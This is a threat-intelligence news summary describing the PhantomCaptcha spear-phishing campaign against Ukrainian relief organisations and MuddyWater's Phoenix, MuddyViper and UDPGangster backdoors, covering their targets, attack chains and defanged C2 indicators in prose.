A coordinated spear-phishing campaign, dubbed PhantomCaptcha, targeted organizations involved in Ukraine's war relief efforts. The campaign delivered a remote access trojan (RAT) using a WebSocket for command-and-control (C2). The attack took place on October 8, 2025, and impersonated the Ukrainian President's Office, using weaponized PDFs and fake Zoom meetings to trick victims into executing malicious PowerShell commands. The malware performed reconnaissance and enabled remote command execution and data exfiltration. The campaign targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF Ukraine, Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations. The malware was hosted on Russian-owned infrastructure and connected to a remote WebSocket server for C2 operations. The campaign took six months to prepare and involved a sophisticated multi-stage spear-phishing operation, with the weaponized PDF appearing as a legitimate governmental communique. The attack chain included a heavily obfuscated PowerShell downloader to bypass signature-based defenses and hinder analysis. The second-stage payload collected various user data, which was XOR-encrypted and sent to the C2 server. The final payload was a lightweight PowerShell backdoor that repeatedly reconnected to the remote WebSocket server. The campaign demonstrated extensive operational planning, compartmentalized infrastructure, and deliberate exposure control, with the infrastructure active only for a single day.
MuddyWater Expands Campaign with MuddyViper Backdoor Targeting Israeli Entities
The MuddyWater threat actor, linked to Iran and also known as Static Kitten, Mercury, and Seedworm, has conducted a global phishing campaign targeting over 100 organizations, including government entities, embassies, diplomatic missions, foreign affairs ministries, consulates, international organizations, and telecommunications firms in the Middle East and North Africa (MENA) region. The campaign used compromised email accounts to send phishing emails with malicious Microsoft Word documents containing macros that dropped and launched the Phoenix backdoor, version 4. This backdoor provided remote control over infected systems. The campaign was active starting August 19, 2025, and used a command-and-control (C2) server registered under the domain screenai[.]online. The attackers employed three remote monitoring and management (RMM) tools and a custom browser credential stealer, Chromium_Stealer. The malware and tools were hosted on a temporary Python-based HTTP service linked to NameCheap's servers. The campaign highlights the ongoing use of trusted communication channels by state-backed threat actors to evade defenses and infiltrate high-value targets. The server and server-side command-and-control (C2) component were taken down on August 24, 2025, likely indicating a new stage of the attack. The MuddyWater threat actor has also targeted Israeli entities spanning academia, engineering, local government, manufacturing, technology, transportation, and utilities sectors. The hacking group has delivered a previously undocumented backdoor called MuddyViper. The attacks also singled out one technology company based in Egypt. The attack chains involve spear-phishing and the exploitation of known vulnerabilities in VPN infrastructure to infiltrate networks and deploy legitimate remote management tools. The campaign uses a loader named Fooder that decrypts and executes the C/C++-based MuddyViper backdoor. 
The MuddyViper backdoor enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. Additionally, the MuddyWater threat actor has deployed a new backdoor called UDPGangster that uses the User Datagram Protocol (UDP) for command-and-control (C2) purposes. The attack chain involves using spear-phishing tactics to distribute booby-trapped Microsoft Word documents that trigger the execution of a malicious payload once macros are enabled. The phishing messages impersonate the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs and purport to invite recipients to an online seminar titled "Presidential Elections and Results." The VBA script in the dropper file is equipped to conceal any sign of malicious activity by displaying a Hebrew-language decoy image from Israeli telecommunications provider Bezeq about supposed disconnection periods in the first week of November 2025 across various cities in the country. UDPGangster establishes persistence through Windows Registry modifications and boasts of various anti-analysis checks to resist efforts made by security researchers to take it apart. UDPGangster connects to an external server ("157.20.182[.]75") over UDP port 1269 to exfiltrate collected data, run commands using "cmd.exe," transmit files, update C2 server, and drop and execute additional payloads.